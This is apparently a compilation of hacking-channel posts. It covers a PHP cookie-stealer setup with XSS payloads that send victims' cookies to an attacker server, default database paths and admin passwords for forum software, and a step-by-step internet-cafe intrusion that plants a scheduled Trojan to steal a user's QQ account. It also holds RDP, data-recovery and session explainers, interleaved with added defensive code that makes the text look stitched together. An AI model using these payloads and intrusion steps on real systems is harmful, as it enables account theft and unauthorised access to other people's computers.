UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ unDerCoDe ▄ ▂ ▁

🦑 PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting

🦑 INSTALLATION & RUN:

1) On the remote attacker machine, start the web server (Apache2 in this example):

    sudo service apache2 start

2) Clone the repo locally, then push the chosen "cookie stealer" PHP script from your local host to the attacking machine:

    git clone https://github.com/RxSec/CookieHeist

3) cd CookieHeist

    sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/

4) sudo scp log.txt username@AttackMachine:/var/www/html/

🦑 AWS version:

    scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.

    sudo mv cookiestealer-simple.php /var/www/html/

Example: http://[Attacker Webserver]/cookiesteal-simple.php

🦑 Setting permissions:
Find out which user owns the httpd process with the following command:

    ps aux | grep httpd

The output should look similar to this:

    ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd

Now you know which user is trying to write files, in this case ec2-user. Set the ownership and permissions of the directory your PHP script writes to:

    sudo chown ec2-user:ec2-user /var/www/html/

    sudo chmod 755 /var/www/html/
XSS payload examples:

    <script>document.location="http://[Attacker Webserver]/cookiesteal-simple.php?c=" + document.cookie + "&t=Alert";</script>
    <script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
    <img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>
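The payloads above all work by reading document.cookie and shipping it to another host. Two defender-side checks, added here as an example and not part of the original post or the CookieHeist repo: a builder for a Set-Cookie header whose HttpOnly, Secure and SameSite attributes keep the session cookie out of document.cookie in the first place, and a scanner that URL-decodes the request line of access-log entries and flags the patterns these payloads leave behind. The log lines and the host name attacker.example are constructed for the example.

```python
"""Added example (not from the original post): hardened Set-Cookie header
plus a detector for cookie-exfiltration XSS payloads in access logs."""
import re
from urllib.parse import unquote_plus


def build_session_cookie(name, value, max_age=3600, domain=None):
    """Return a Set-Cookie header value for a session cookie.
    HttpOnly keeps it out of document.cookie, Secure limits it to HTTPS,
    SameSite=Strict stops the browser attaching it to cross-site requests."""
    if not re.fullmatch(r"[A-Za-z0-9!#$%&'*+\-.^_`|~]+", name):
        raise ValueError("invalid cookie name")
    if any(c in value for c in ' ",;\\'):
        raise ValueError("cookie value must be encoded first")
    parts = [f"{name}={value}", f"Max-Age={int(max_age)}", "Path=/"]
    if domain:
        parts.append(f"Domain={domain}")
    parts += ["Secure", "HttpOnly", "SameSite=Strict"]
    return "; ".join(parts)


# Patterns characteristic of the payloads above. They are applied to the
# URL-decoded, lower-cased request so %64%6f%63... or DOCUMENT.COOKIE still hit.
_EXFIL_PATTERNS = [
    re.compile(r"document\.cookie"),
    re.compile(r"(document\.location|window\.location|location\.href)\s*="),
    re.compile(r"<img[^>]+onerror\s*="),
]


def find_cookie_exfil(log_lines):
    """Scan Combined-Log-Format lines; return (line_no, pattern, decoded_request)
    for each line whose request carries a cookie-stealing payload."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) ([^ ]+) HTTP/[0-9.]+"', line)
        if not m:
            continue
        # decode twice: payloads are often double-encoded to slip past filters
        req = unquote_plus(unquote_plus(m.group(1))).lower()
        for pat in _EXFIL_PATTERNS:
            if pat.search(req):
                hits.append((n, pat.pattern, req))
                break
    return hits


# Constructed sample log (not real traffic): one benign request, two injected.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /search?q=apache+tuning HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2Fc.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 601',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /profile?name=%3Cimg%20src%3Dx%20onerror%3Dthis.src%3D%27http%3A%2F%2Fattacker.example%2Fc.php%3Fcookie%3D%27%2Bdocument.cookie%3E HTTP/1.1" 200 455',
]

if __name__ == "__main__":
    print(build_session_cookie("PHPSESSID", "abc123"))
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(hit)
```

With HttpOnly set, every one of the three payloads above reads an empty document.cookie, so the stealer script receives nothing; the log scanner is the second line of defence for spotting the attempt in the victim site's own logs.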

▁ ▂ ▄ unDerCoDe ▄ ▂ ▁

🦑 The default databases of various website programs:
t.me/UndercodeTesting

Dynamic network (Dvbbs):
default database: /data/dvbbs7.mdb
backup database: /databackup/dvbbs7.mdb
foreground: user name admin, password admin888
background: user name admin, password admin888
---------------
BBSXP:
default database: /database/bbsxp.mdb
---------------
LeadBBS:
default database: /Data/LeadBBS.mdb
username: Admin, password: admin
---------------
6kbbs:
default database: /db/6k.asp
username: admin, password: 6kadmin
-----------------------------------------
/data/dvbbs7.mdb - Dongwang forum database
    foreground: username admin, password admin888
    background: username admin, password admin888
/databackup/dvbbs7.mdb - Dongwang forum database
/bbs/databackup/dvbbs7.mdb - Dongwang forum database
/data/zm_marry.asp - ...ized database
/admin/data/qcdn_news.mdb - Chong Qing article management system database
/data/qcdn_news.mdb - Chong Qing article management system database
/firend.mdb - Dating Service database
/database/newcloud6.mdb - New Cloud management system 6.0 database
/database/%23newasp.mdb - New Cloud website system database
/database/powereasy4.mdb - Dongyi website management system 4.03 database
/blogdata/l-blog.mdb - L-Blog v1.08 database
/database/bbsxp.mdb - BBSXP forum database
/bbs/database/bbsxp.mdb - BBSXP forum database
/access/sf2.mdb - Snowman forum program v2.0 database
/data/leadbbs.mdb - LeadBBS forum v3.14 database (username admin, password admin)
/bbs/data/leadbbs.mdb - LeadBBS forum v3.14 database
/bbs/access/sf2.mdb - Snowman forum program v2.0 database
/blog/blogdata/l-blog.mdb - L-Blog v1.08 database
/fdnews.asp - Liuhe dedicated BBS database
/bbs/fdnews.asp - Liuhe dedicated BBS database
/admin/ydxzdate.asa - Raindrop download system v2.0 + sp1 database
/data/down.mdb - Download System XP v1.3 database
/database/database.mdb - Xuanxi download system v3.1 database
/db/xzjddown.mdb - lhdownxp download system database
/db/play.asp - Entertainment Pioneer Forum v3.0 database
/mdb.asp - Jingyun download system v1.2 database
/admin/data/user.asp - Shock Cloud download system v3.0 database
/data_jk/joekoe_data.asp - Joekoe 6.0 database
/data/news3000.asp - Boiling Outlook news system v1.1 database
/data/appoen.mdb - Huixin News System 4.0 database
/data/12912.asp - Flying Dragon Article Management System v2.1 database
/database.asp - Dynamic Needs Download Management System v3.5 database
/download.mdb - Aberdeen Software Download Management System v2.3 database
/dxxobbs/mdb/dxxobbs.mdb - dxxobbs forum database
/db/6k.asp - 6kbbs (username admin, password 6kadmin)
/database/snowboy.mdb - Snow Boy forum (default backend: /admin/admin_index.asp)
/database/#mmdata.mdb - Yishuang community
/starark.asp - Poor Dragon ASP website generation system

written by Under code
▁ ▂ ▄ unDerCoDe ▄ ▂ ▁

🦑 Port 3389 explained: why is it used for hacking?
youtube.com/undercode

3389 originally refers to TCP port 3389 on a computer. It is generally used as shorthand for Remote Desktop, and the port number can be changed. It is not a Trojan horse program, but if it is not needed, the hacker base recommends shutting the service down.
🦑 It is called 3389 because that is the default port of the Windows Remote Desktop service (which can be modified).

3389 is generally used to mean the Remote Desktop service.

Microsoft's Remote Desktop exists so that computer administrators can remotely manage their own machines,

but as long as someone holds an administrative password, 3389 will serve that person just the same ...

Most hackers like to open 3389 on a compromised machine (a "chicken"),

because 3389 is a normal system service and is therefore very convenient to use.

It gives the same effect as remote-control software such as Grey Pigeon; the main point is that it is a legitimate service ...

Port 3389 is easy to find with scanning tools (such as SuperScan, X-Scan and the like). Because some computer users lack security awareness, they often leave the administrator account or a new account with a blank password, so even rookies can use mstsc.exe to log in to other people's computers in GUI mode. To prevent others from logging in to your computer through 3389, it is best to set a password on every account or block the port with a firewall. Closing 3389 is recommended.

🦑 To close port 3389:

First, port 3389 is the port opened by the Windows remote management terminal. It is not a Trojan horse program. Check first whether you opened the service yourself; if it is not needed, it is recommended to close it.

Win8 Server: Start -> Programs -> Administrative Tools -> Services, find the Terminal Services item, open its Properties, change the startup type to Manual and stop the service.

Win8: Start -> Settings -> Control Panel -> Administrative Tools -> Services, find the Terminal Services item, open its Properties, change the startup type to Manual and stop the service.

🦑 How to close it in Windows: right-click My Computer, select Properties -> Remote, and untick both the Remote Assistance and Remote Desktop boxes.

Close port 3389 through the registry:

Start -> Run

Enter regedit to open the registry.

Go to the branch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp, select the value named PortNumber, and change its 3389 to something else (such as 1234). Note that there are two control sets, ControlSet001 and ControlSet002: do ControlSet001 first, then ControlSet002.

Next look at CurrentControlSet:

The branch HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp holds a PortNumber value (there may be one or several similar subkeys); change its value 3389 to something else (such as 1234) in the same way.
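Checking the result of the registry edits above by hand is error-prone, so here is an added example (not from the original post) that audits an exported registry fragment instead. The text is exported with the Windows command reg export "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" ts.reg, and the parser handles the dword and string value syntax of that file format. Besides PortNumber from the post, the audit reads fDenyTSConnections (1 = Remote Desktop disabled) and UserAuthentication (1 = Network Level Authentication required), two real values under the same keys that the post does not mention. The SAMPLE_REG text is constructed for the example.

```python
"""Added example (not from the original post): parse a .reg export of the
Terminal Server keys and report how exposed Remote Desktop is."""
import re

TS_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_reg_export(text):
    """Parse the dword and string values of a .reg file.
    Returns {key_path: {value_name: value}} with dword values as ints."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m or current is None:
            continue
        name, data = m.groups()
        if data.startswith("dword:"):
            keys[current][name] = int(data[len("dword:"):], 16)
        elif data.startswith('"') and data.endswith('"'):
            keys[current][name] = data[1:-1]
    return keys


def audit_rdp(keys):
    """Return a list of findings; an empty list means RDP is off or hardened."""
    findings = []
    ts = keys.get(TS_ROOT, {})
    # fDenyTSConnections = 1 means Remote Desktop is switched off
    if ts.get("fDenyTSConnections", 0) != 1:
        findings.append("Remote Desktop connections are allowed (fDenyTSConnections != 1)")
    rdp_tcp = keys.get(TS_ROOT + r"\WinStations\RDP-Tcp", {})
    port = rdp_tcp.get("PortNumber")
    if port == 3389:
        findings.append("RDP listens on the default port 3389")
    elif port is not None:
        findings.append(f"RDP listens on non-default port {port}")
    # UserAuthentication = 1 means Network Level Authentication is required
    if rdp_tcp.get("UserAuthentication", 0) != 1:
        findings.append("Network Level Authentication not required (UserAuthentication != 1)")
    return findings


# Constructed sample export (not a real machine): RDP enabled on 3389, no NLA.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"UserAuthentication"=dword:00000000
"""

if __name__ == "__main__":
    for finding in audit_rdp(parse_reg_export(SAMPLE_REG)):
        print("-", finding)
```

Moving the port, as the post suggests, only changes the second finding; a port scanner still finds the service, so disabling it (fDenyTSConnections = 1) or requiring NLA and a firewall rule is what actually reduces the exposure.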

written by undercode
▁ ▂ ▄ unDerCoDe ▄ ▂ ▁

🦑 Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing

> There is a lot of Internet cafe management software, but most of it has one loophole or another, so there are many techniques for cracking Internet cafe software:

> surfing the Internet for free, the "command prompt" method, getting administrator permissions, and so on. As a result, Internet cafes have become the places where virtual property is lost most severely. But as long as the Internet cafe administrator is skilled enough, this can be avoided. Let me tell you how I used to get an MM's QQ number in Internet cafes. It is a little complicated; the hacker base mainly wants you to learn some of the commands used during hacking.


🦑 LET'S START:


Step 1: First determine the IP of the computer the MM is using. In an Internet cafe the computer number and the IP address usually match or are off by one. For example, computer number 20 is generally 192.168.0.20 or 192.168.0.21 (192.168.0.1 is left for the router). The machine names are regular too: computer 20 is usually named Wangba20, so once you know which computer the MM is using, open the "command prompt" and run ping Wangba20 to get its IP address, such as 192.168.0.20.

> Step 2: With the IP you can start connecting to the MM's computer. Because Internet cafe computers mostly run Windows 2000 that has not been patched, and the login user name is mostly of the form "user<number>" with an empty password, at the "command prompt" enter net use \\192.168.0.20\ipc$ "" /user:"" and net use \\192.168.0.20\ipc$ "" /user:"user20" to establish a connection.

> After the connection succeeds you must close the anti-virus software on the other computer: right-click "My Computer", select "Manage", in the window that pops up right-click "Computer Management (Local)", select "Connect to another computer", connect to 192.168.0.20 and start the "Telnet" service ("Computer Management" can manage remote computers directly).

- Step 3: Enter two commands at the "Command Prompt" to create a new user20 user on this machine and add it to the administrators group.

    net user user20 /add

    net localgroup administrators user20 /add

- Step 4: Go to C:\Winnt\System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties" and tick "Run as other user" (to run the program as another user). Run the CMD shortcut; when the "Run as other user" window pops up, enter "user20" and press Enter.

- Step 5: Log in to the MM's computer with telnet 192.168.0.20, then download a command-line process-killing tool from the Internet, such as knlps, and close the anti-virus process over telnet.

- Step 6: Now you can download a Trojan and copy it to the MM's computer with "copy Trojan-name.exe \\192.168.0.20\admin$". Then use net time \\192.168.0.20 to get the MM computer's time, for example 4 pm, and finally use "at \\192.168.0.20 <time> Trojan-name.exe", for example "at \\192.168.0.20 16:02 Trojan-name.exe", to run the Trojan at the specified time.

🦑 With a Trojan in place, you naturally get to know the QQ number the MM uses.

So, are Internet cafes dangerous? You can rest assured that not all Internet cafes are like this; most are still very safe. When you use QQ or other software, select "Internet cafe mode" (the "Login Mode" option appears after clicking "Advanced Settings").


written by undercode
▁ ▂ ▄ unDerCoDe ▄ ▂ ▁

🦑 Basic knowledge of data record recovery
t.me/UndercodeTesting


🦑 Let's start with the data structure of the hard disk.

Hard disk data structure

We cannot use a hard disk as it comes from the shop: it has to be partitioned and formatted, and then an operating system installed, before it can be used. Taking the 9x/Me series that we have been using up to now, the hard disk is generally divided into five parts: the master boot sector, the operating system boot sector, the FAT, the DIR and the DATA area (of which only the master boot sector exists exactly once; the number of the others grows with the number of partitions).

Master boot sector

The master boot sector is located at cylinder 0, head 0, sector 1 of the whole hard disk and contains the master boot record MBR (Master Boot Record) and the partition table DPT (Disk Partition Table). The job of the master boot record is to check whether the partition table is correct, determine which partition is the boot partition, and at the end of the program load that partition's startup program (that is, the operating system boot sector) into memory for execution. As for the partition table, many people know it: each entry starts with 80H or 00H, the table is 64 bytes in total, it sits at the very end of the sector and is followed by the 55AAH signature. It is worth mentioning that the MBR is generated by a partitioning program (such as Fdisk.exe under DOS), and this sector may differ between operating systems. If you are so inclined you can write one yourself, as long as it completes the tasks above; this is why multi-system booting can be achieved (and also why there are so many boot sector viruses).

Operating system boot sector

OBR (OS Boot Record) is the boot sector of the operating system, usually located at cylinder 0, head 1, sector 1 of the hard disk (this is for DOS; for systems that boot in multi-boot mode it is located in the first sector of the corresponding primary partition or extended partition). It is the first sector the operating system can access directly. It also contains a boot program and a partition parameter record table called the BPB (BIOS Parameter Block). In fact every logical partition has an OBR, and its parameters vary with the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the partition's root directory are the operating system's boot files (such as IO.SYS and MSDOS.SYS of MS-DOS and of the MS-DOS-derived Win9x/Me). If so, the first file is read into memory and control is handed to it. The BPB parameter block records important parameters such as the start sector, end sector, file storage format, hard disk media descriptor, root directory size, number of FATs and size of the allocation unit (also called the cluster) in the partition. The OBR is generated by a high-level formatter (for example Format.com under DOS).

File allocation table

The FAT (File Allocation Table) is the file allocation table of the DOS/Win9x system. For data safety two FATs are generally kept, the second being a backup of the first. The FAT area immediately follows the OBR, and its size is determined by the size of the partition and the size of the file allocation unit. There have always been many choices for the format of the FAT. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but there are no other FAT formats beyond these; systems like Windows NT, OS/2, UNIX/Linux, Novell and so on have their own file management methods.

Directory area

DIR is the abbreviation of Directory, that is, the root directory area. DIR immediately follows the second FAT table. The FAT alone cannot locate a file on the disk; it must work together with the DIR to pin down a file's location precisely. DIR records the starting unit of each file (or directory) (this is the most important part), the file attributes and so on. When locating a file, the operating system can work out the exact location and size of the file on the disk from the starting unit in the DIR and the FAT table. After the DIR area comes the real data storage area, namely the DATA area.

Data area

Although DATA occupies most of the space on the hard disk, without the preceding parts it is, to us, only boring binary code that makes no sense. One thing to note here is that what we usually call a formatter (meaning high-level formatting, such as the Format program under DOS) does not clear the data in the DATA area; it only rewrites the FAT table. Partitioning the hard disk, likewise, only modifies the MBR and OBR. Most of the data in the DATA area is not changed, which is why a lot of hard disk data can be repaired. Even so, if any one of MBR/OBR/FAT/DIR is destroyed, it is enough to keep our so-called DIY veterans busy for a long time ... What needs to be pointed out is that if you tidy up (defragment) the disk regularly, the data in your data area may be contiguous, so even if MBR/FAT/DIR are all broken we can use disk editing software (such as DiskEdit under DOS): as long as we find the starting storage location of a file, that file may be recovered (of course, on one condition, namely that you have not overwritten the file ...).

🦑 Hard disk partitions

The partition concepts we usually talk about are no more than three types: primary partition, extended partition and logical partition.

The primary partition is a relatively simple partition, usually located in the frontmost area of the hard disk, forming the logical C drive. No other logical drives are allowed inside the primary partition.

The concept of extended partitions is more complicated and is also the main cause of confusion between partitions and logical drives. Since the hard disk reserves only 64 bytes of storage for the partition table, and the parameters of each partition occupy 16 bytes, the data of at most 4 partitions can be stored in the master boot sector. The operating system only allows the data of 4 partitions to be stored. If one logical drive were one partition, the system would allow at most 4 logical drives. For practical applications, 4 logical drives often cannot meet actual needs. In order to build more logical drives for the operating system to use, the concept of extended partitions was introduced.
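The description above of the 64-byte partition table (four 16-byte entries, 80H/00H boot flag, 55AAH signature) and of the FAT as a chain of "next unit" pointers starting from the start cluster held in the DIR entry is exactly what a recovery tool reads first. The following is an added example, not code from the original post: it decodes the DPT of a master boot sector and walks a FAT16 cluster chain, refusing to follow free, bad or looping entries, which is what a damaged FAT looks like. The MBR sector and the FAT bytes are constructed inline; the CHS fields in the sample entries are filler.

```python
"""Added example (not from the original post): decode the partition table
of a master boot sector and follow a FAT16 cluster chain."""
import struct

SECTOR_SIZE = 512


def parse_partition_table(sector):
    """Return the used entries of the DPT (bytes 446..509) as dicts.
    Raises ValueError if the sector is not 512 bytes or lacks the 55AAH signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected one 512-byte sector")
    if sector[510:512] != b"\x55\xaa":
        raise ValueError("missing 55AA boot signature")
    entries = []
    for i in range(4):
        off = 446 + 16 * i
        boot, _chs_start, ptype, _chs_end, lba_start, sectors = struct.unpack(
            "<B3sB3sII", sector[off:off + 16])
        if ptype == 0:
            continue  # unused slot
        entries.append({
            "active": boot == 0x80,   # 80H = bootable partition, 00H = not
            "type": ptype,            # e.g. 06H = FAT16, 05H = extended
            "lba_start": lba_start,
            "sectors": sectors,
        })
    return entries


def build_sample_mbr():
    """Constructed MBR: zeroed boot code, one active FAT16 partition (06H) at
    LBA 63 with 1,048,513 sectors, and one extended partition (05H)."""
    sector = bytearray(SECTOR_SIZE)
    sector[446:462] = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x06, b"\xfe\xbf\x3f", 63, 1048513)
    sector[462:478] = struct.pack("<B3sB3sII", 0x00, b"\x00\x01\x3f", 0x05, b"\xfe\xff\xff", 1048576, 2097152)
    sector[510:512] = b"\x55\xaa"
    return bytes(sector)


def walk_fat16_chain(fat, start_cluster, max_clusters=65536):
    """Follow a FAT16 chain from the start cluster a DIR entry points at.
    Each 16-bit entry holds the next cluster; 0xFFF8..0xFFFF ends the chain,
    0x0000 is a free cluster and 0xFFF7 a bad one (both mean a broken chain)."""
    chain = []
    cluster = start_cluster
    while True:
        if cluster < 2 or cluster * 2 + 2 > len(fat):
            raise ValueError(f"cluster {cluster} out of range")
        if cluster in chain:
            raise ValueError("loop in FAT chain (corrupted table)")
        chain.append(cluster)
        nxt = struct.unpack_from("<H", fat, cluster * 2)[0]
        if nxt >= 0xFFF8:
            return chain
        if nxt == 0x0000 or nxt == 0xFFF7:
            raise ValueError(f"chain broken at cluster {cluster} (entry {nxt:#06x})")
        if len(chain) >= max_clusters:
            raise ValueError("chain too long")
        cluster = nxt


def build_sample_fat16():
    """Constructed 16-entry FAT16 holding one file on clusters 3 -> 4 -> 7 (end)."""
    fat = bytearray(16 * 2)
    struct.pack_into("<H", fat, 0, 0xFFF8)   # entry 0: media descriptor
    struct.pack_into("<H", fat, 2, 0xFFFF)   # entry 1: reserved
    struct.pack_into("<H", fat, 3 * 2, 4)
    struct.pack_into("<H", fat, 4 * 2, 7)
    struct.pack_into("<H", fat, 7 * 2, 0xFFFF)
    return bytes(fat)


def file_sectors(chain, data_start_lba, sectors_per_cluster):
    """Map a cluster chain to absolute sectors; cluster 2 is the first data cluster."""
    return [data_start_lba + (c - 2) * sectors_per_cluster + s
            for c in chain for s in range(sectors_per_cluster)]


if __name__ == "__main__":
    print(parse_partition_table(build_sample_mbr()))
    chain = walk_fat16_chain(build_sample_fat16(), 3)
    print(chain, file_sectors(chain, 100, 2))
```

This is also why the "find the start of the file and read on" recovery trick in the text works when the FAT is gone but the file was contiguous: without the chain you can only assume that cluster n is followed by cluster n+1.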


The basic knowledge of data recovery has now been more or less introduced to you.

written by undercode
▁ ▂ ▄ unDerCoDe ▄ ▂ ▁

🦑 Talk about the specific role of the session
t.me/UndercodeTesting


1) First of all, the session is implemented by the language and has nothing to do with the web server; for example, the PHP session is implemented by the PHP language.

2) Second, the content of the session is stored on the server, but as everyone knows the session is often used for authentication, to identify each user. How does it correspond to the client?

> In fact it is very simple. When the user submits a browsing request, the cookie carries a session field, which in PHP is the SESSIONID. In this way the server knows that the requester's session is stored under that SESSIONID and can read the corresponding data. Where did this SESSIONID come from?

3) Again, the session has a default timeout; I remember ASP's seems to be 20 minutes, not sure. So if you cross-site someone and only get the cookie a long time later, you can't log in with it. This is also the reason it has been said that after cross-siting the Dongwang forum you can't log in to the backend. Wasn't it legend that the session cannot be forged? That was because there were no tools like SessionIE at the time to keep the session from expiring. Back then, if the administrator happened to be cross-sited and had not logged out of the backend, you could log in to the backend with that cookie, because the sessionid had not yet expired.

4) Also, tools like SessionIE are not omnipotent. If the web program is well written, then when the cross-sited user logs out of the system the cookie and session are destroyed, and the attacker cannot keep the session state, because the session corresponding to this sessionid no longer exists on the server side: although you submit the sessionid, there is no corresponding session data on the server. The server program cannot obtain the session content required for authentication, and naturally the authentication fails.

5) Finally, such tools can be written as CGI programs in languages such as PHP that support sockets; ASP's XmlHTTP should be subject to cross-domain restrictions. That is to say, I put a PHP program on a compromised host (a "broiler") that reads the cookie list periodically and then uses the curl library to load the cookie and access the corresponding URL, keeping the state from being lost, so you can switch your own PC off.

6) In the end, there is nothing mysterious or bizarre about the session. Its essence is just a piece of data saved on the server side. This data has a unique ID, which the server tells the client through a Set-Cookie. Then, when the client sends this ID with its request, the server can associate the session with the client.
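The six points above describe a session store completely: an ID handed out in a cookie, data kept only on the server, a sliding idle timeout, and logout deleting the server-side record so a copied ID is worthless. The following is an added example, not code from the original post or from PHP/ASP: a minimal store with those properties and a demo() that replays the post's scenarios against a fake clock. The 20-minute timeout is taken from the post's ASP recollection; the SESSIONID cookie name follows the post.

```python
"""Added example (not from the original post): a minimal server-side session
store showing why an expired or destroyed session ID no longer authenticates."""
import secrets
import time


class SessionStore:
    def __init__(self, timeout_seconds=20 * 60, clock=time.time):
        self.timeout = timeout_seconds
        self.clock = clock        # injectable so the demo can move time forward
        self._sessions = {}       # session_id -> {"data": dict, "last_seen": float}

    def create(self, data):
        """Start a session; returns the ID the server sends in Set-Cookie."""
        sid = secrets.token_urlsafe(32)   # 256 random bits, not guessable
        self._sessions[sid] = {"data": dict(data), "last_seen": self.clock()}
        return sid

    def set_cookie_header(self, sid):
        """The cookie carries only the ID; HttpOnly keeps scripts from reading it."""
        return f"SESSIONID={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"

    def lookup(self, cookie_header):
        """Resolve a request's SESSIONID cookie to its server-side data.
        Returns None for an unknown, expired or destroyed session."""
        sid = None
        for part in cookie_header.split(";"):
            k, _, v = part.strip().partition("=")
            if k == "SESSIONID":
                sid = v
        if sid is None or sid not in self._sessions:
            return None
        rec = self._sessions[sid]
        now = self.clock()
        if now - rec["last_seen"] > self.timeout:
            del self._sessions[sid]   # idle too long: data is gone, ID is useless
            return None
        rec["last_seen"] = now        # sliding timeout: each request extends it
        return rec["data"]

    def destroy(self, sid):
        """Logout: drop the server-side record; the client's cookie is now meaningless."""
        self._sessions.pop(sid, None)


def demo():
    """Replay the post's scenarios with a fake clock; returns a dict of results."""
    now = [1000.0]
    store = SessionStore(timeout_seconds=20 * 60, clock=lambda: now[0])
    sid = store.create({"user": "admin", "role": "backend"})
    cookie = f"SESSIONID={sid}"
    results = {}
    results["fresh"] = store.lookup(cookie) is not None        # valid right away
    now[0] += 10 * 60
    results["kept_alive"] = store.lookup(cookie) is not None   # a request every few minutes keeps it alive
    now[0] += 25 * 60
    results["after_timeout"] = store.lookup(cookie) is None    # idle longer than 20 min: gone
    sid2 = store.create({"user": "admin"})
    store.destroy(sid2)                                        # admin logs out
    results["after_logout"] = store.lookup(f"SESSIONID={sid2}") is None
    results["forged"] = store.lookup("SESSIONID=AAAA") is None  # unknown ID has no data
    return results


if __name__ == "__main__":
    for scenario, ok in demo().items():
        print(f"{scenario}: {'as expected' if ok else 'UNEXPECTED'}")
```

The "kept_alive" case is the behaviour point 3 relies on and the "after_logout" case is point 4: a well-written application destroys the record on logout, and a short idle timeout bounds how long a leaked ID stays usable.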

written by undercode
▁ ▂ ▄ unDerCoDe ▄ ▂ ▁